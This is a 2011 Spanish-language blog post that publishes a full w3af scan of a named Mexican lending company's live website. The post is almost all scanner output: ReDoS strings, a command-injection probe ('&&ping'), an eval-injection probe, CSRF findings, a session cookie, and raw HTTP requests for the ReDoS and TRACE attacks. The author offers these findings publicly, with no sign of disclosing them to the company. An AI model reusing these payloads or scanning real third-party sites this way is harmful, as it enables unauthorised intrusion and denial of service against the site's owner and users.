jueves, 26 de mayo de 2011

Provident Vulnerable a ReDoS

Saludos Mundo libre.

He aqui otre web vulnerable a ReDoS y a xrfs:get_xsrf y xst: xst
Esta es una empresa que sededica al prestamo de dinero enfocado alas amas de casa
scaneo:


http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ



[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.collectCookies

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.httpAuthDetect

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.error500

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.serverHeader

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.allowedMethods

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.frontpage_version

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.passwordProfiling

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.getMails

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.lang

[Thu 26 May 2011 12:08:19 PM EDT] The "lang" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.

[Thu 26 May 2011 12:08:24 PM EDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.

[Thu 26 May 2011 12:08:38 PM EDT] The page language is: es

[Thu 26 May 2011 12:08:39 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.

[Thu 26 May 2011 12:08:46 PM EDT] Starting formAuthBrute plugin execution.

[Thu 26 May 2011 12:08:46 PM EDT] Starting basicAuthBrute plugin execution.

[Thu 26 May 2011 12:08:46 PM EDT] Found 3 URLs and 5 different points of injection.

[Thu 26 May 2011 12:08:46 PM EDT] The list of URLs is:

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:08:46 PM EDT] The list of fuzzable requests is:

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1 | Method: GET | Parameters: (gclid="CJD-8bTDhq...")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="10000")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="3900")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search | Method: GET | Parameters: (q="")

[Thu 26 May 2011 12:08:56 PM EDT] The web application sent a persistent cookie.

[Thu 26 May 2011 12:08:56 PM EDT] The following scripts are vulnerable to a trivial form of XSRF:

[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/search is vulnerable to cross site request forgery.

[Thu 26 May 2011 12:10:02 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.

[Thu 26 May 2011 12:10:02 PM EDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 19 to 20.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/campaign_lp_v1" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 1.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 21.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 22.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/search" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 32.

[Thu 26 May 2011 12:11:02 PM EDT] A possible ReDoS was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=11111111111111111111111111111111199%21". . Please review manually. This information was found in the request with id 239.

[Thu 26 May 2011 12:11:02 PM EDT] ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.

[Thu 26 May 2011 12:13:22 PM EDT] A possible OS Commanding was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=%26%26ping+-c+9+localhost".Please review manually. This information was found in the request with
id 327.

[Thu 26 May 2011 12:14:35 PM EDT] eval() input injection was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=import+time%3Btime.sleep(9)%3B". . Please review manually. This information was found in the request with id 569.

[Thu 26 May 2011 12:16:06 PM EDT] The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.

[Thu 26 May 2011 12:19:00 PM EDT] Password profiling TOP 100:

[Thu 26 May 2011 12:19:00 PM EDT] - [1] Loan with 9024 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [2] Pago with 3028 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [3] Amount with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [4] rate with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [5] Home with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [6] Weekly with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [7] Type with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [8] service with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [9] Interest with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [10] Repayment with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [11] charges with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [12] Term with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [13] Breakdown with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [14] pago with 1506 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [15] Primer with 1504 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [17] Regular with 1504 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [18] Seleccionar with 1504 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [19] ClickTale with 1416 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [20] document with 1320 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [21] script with 1300 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [23] https with 944 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [24] part with 944 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [25] text with 944 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [26] javascript with 708 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [27] type with 695 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [30] class with 540 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [32] function with 492 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [33] sitio with 474 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [34] clicktale with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [35] Bottom with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [36] site with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [37] endif with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [38] protocol with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [39] location with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [40] push with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [41] write with 376 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [43] Mexico with 356 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [45] Buscar with 332 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [50] favor with 290 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [51] cript with 280 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [52] typeof with 256 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [56] segment with 240 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [58] Promociones with 238 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [59] Nuestro with 238 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [60] Noticias with 238 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [63] Imprimir with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [64] contigo with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [65] Seguridad with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [66] Mapa with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [67] compromiso with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [68] Busque with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [70] frecuentes with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [73] pantherssl with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [74] Preguntas with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [75] CURRENCY with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [76] 3Cscript with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [78] WRb6 with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [80] href with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [81] stylesheet with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [82] getElementsByTagName with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [84] media with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [85] getTime with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [86] unescape with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [87] Nuestra with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [88] Date with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [89] parentNode with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [90] 20src with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [91] analytics with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [92] ClickTaleSSL with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [93] Accesibilidad with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [94] www02 with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [95] screen with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [96] Usuario with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [98] 20type with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [99] Inicio with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [100] async with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] The cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/" was sent by these URLs:

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/ZEPQu.html

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/_vti_inf.html

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/EEfFv

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_bin/_vti_aut/author.dll

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_inf.html

[Thu 26 May 2011 12:19:00 PM EDT] Finished scanning process.



redos: Redos Vulneravilidad.



ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.



GET http://www.provident.com.mx/pages/search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21 HTTP/1.1

Host: www.provident.com.mx

Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;

Accept-encoding: identity

Accept: */*

User-agent: w3af.sourceforge.net



xrfs:get_xsrf



The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.



xst: xst



The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.



TRACE http://www.provident.com.mx/pages/?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ HTTP/1.1

Host: www.provident.com.mx

Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;

Accept-encoding: identity

Accept: */*

User-agent: w3af.sourceforge.net





Liga de Informacion:http://en.wikipedia.org/wiki/ReDoS

Hay se las Dejo

Saludos Mundo Libre.

2 comentarios: